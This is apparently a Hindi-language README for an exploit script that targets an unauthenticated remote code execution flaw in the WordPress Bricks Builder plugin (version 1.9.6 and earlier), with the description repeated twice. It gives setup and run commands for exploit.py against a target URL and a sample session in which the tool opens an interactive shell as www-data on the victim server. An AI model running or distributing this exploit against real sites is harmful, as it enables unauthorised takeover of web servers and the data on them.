
अप्रमाणित दूरस्थ कोड निष्पादन कमजोरी WordPress Bricks Builder <= 1.9.6 में। टेम्पलेट रेंडर एंडपॉइंट बिना प्रमाणीकरण के PHP कोड स्वीकार करता है, जिससे वेब सर्वर उपयोगकर्ता के रूप में मनमाना कमांड निष्पादन संभव होता है।
WordPress Bricks Builder <= 1.9.6 में बिना प्रमाणीकरण के रिमोट कोड निष्पादन की भेद्यता। टेम्पलेट रेंडर एंडपॉइंट बिना प्रमाणीकरण के PHP कोड स्वीकार करता है, जिससे वेब सर्वर उपयोगकर्ता के रूप में मनमाना कमांड निष्पादन की अनुमति मिलती है।
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET
उदाहरण:
$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)